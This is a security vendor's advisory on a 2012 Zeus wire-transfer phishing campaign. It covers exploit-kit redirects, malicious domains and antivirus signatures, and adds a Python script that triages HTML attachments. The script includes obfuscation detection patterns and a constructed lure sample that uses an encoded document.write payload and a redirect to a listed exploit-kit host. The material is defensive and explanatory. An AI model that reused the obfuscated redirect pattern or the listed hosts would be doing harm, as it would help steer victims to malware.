Zeus Wire Transfer targeted attacks

May 11, 2012

The SonicWALL Threat Research team spotted a wave of wire transfer fraud e-mails in the wild starting early this morning. The e-mail notifies the user that a recent wire transaction was cancelled and asks the user to open the attached HTML file or visit a URL given in the e-mail body. If the user opens the attached HTML file or visits the URL, they are redirected to a Phoenix Exploit Kit site serving malware.

Below are the sample e-mails we saw from this campaign:

The HTML attachment contains obfuscated JavaScript that sends the user's browser to a remote Phoenix Exploit Kit site, which downloads a malicious PDF file; upon successful exploitation, the system is infected with a new variant of the Zeus P2P Trojan.
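As an added defender-side example (not code from this SonicAlert), the following Python triages an HTML e-mail attachment of the kind described above: it extracts every script body, scores constructs typical of obfuscated redirectors, and flags URLs pointing at the hosts listed in this alert. The sample attachment is constructed for the demonstration and is not the actual lure; the scoring weights are an assumption.

```python
import re
from html.parser import HTMLParser

# Hosts listed in the advisory, port included as observed.
KNOWN_BAD_HOSTS = {"vanessamiyhome.ru:8080", "vanishingmasers.ru:8080"}
# Constructs common in obfuscated redirector scripts; each hit raises the score.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(", "setTimeout(")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+(?::\d+)?)", re.I)
# Long runs of %NN or \xNN escapes usually hide a packed payload string.
ESCAPED_RUN_RE = re.compile(r"(?:\\x[0-9a-f]{2}|%[0-9a-f]{2}){40,}", re.I)

class _ScriptExtractor(HTMLParser):  # collects the body of every <script> element
    def __init__(self):
        super().__init__()
        self._in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def triage_html_attachment(html):
    """Score one HTML attachment body; returns (score, list of findings)."""
    parser = _ScriptExtractor()
    parser.feed(html)
    hits = []  # (weight, message) pairs
    for body in parser.scripts:
        hits += [(1, "script uses " + m) for m in OBFUSCATION_MARKERS if m in body]
        if ESCAPED_RUN_RE.search(body):
            hits.append((2, "long escaped string in script"))
    for host in set(HOST_RE.findall(html)):
        if host.lower() in KNOWN_BAD_HOSTS:
            hits.append((5, "known exploit-kit host " + host))
    return sum(w for w, _ in hits), [msg for _, msg in hits]

# Constructed sample, not the real attachment: a packed iframe plus a delayed redirect.
_PACKED = "".join("%%%02x" % ord(c) for c in '<iframe src="about:blank" width=1 height=1></iframe>')
SAMPLE_ATTACHMENT = (
    "<html><body><p>Loading wire transfer report...</p>"
    "<script>var s='" + _PACKED + "';document.write(unescape(s));</script>"
    "<script>setTimeout(function(){location='http://vanessamiyhome.ru:8080/'},1000)</script>"
    "</body></html>"
)
```

Run over a mail gateway's quarantined HTML attachments, anything scoring above a few points is worth a sandbox detonation or manual look; the host list should be fed from current threat intelligence rather than hard-coded as here.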

Below are some of the domains involved:

  • vanessamiyhome.ru:8080
  • vanishingmasers.ru:8080

While the Phoenix Exploit Kit is in action, it displays a fake NACHA page that lets the user download a "report", which is in reality the Zeus Trojan:

We also spotted a small number of e-mails that were part of a spear-phishing campaign using the same theme, in which corporate executive staff were targeted. The e-mail pretends to be from the Federal Reserve System's fraud department and contains a URL pointing to a malicious site, federalreserve(REMOVED).com. A sample e-mail message looks like:

This phishing site redirects users to a Blackhole Exploit Kit site serving the Zeus Trojan. The initial website is hosted on Amazon's cloud servers, and we have notified Amazon's security team about it. The functionality of the Zeus binary involved in both spam campaigns is similar to what we saw in a previous SonicAlert: Zeus P2P variant served via spammed Blackhole exploit links (Mar 2, 2012).

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Blacole.gen_2 (Exploit)
  • GAV: Blacole.WR (Exploit)
  • GAV: Zbot.IVT (Trojan)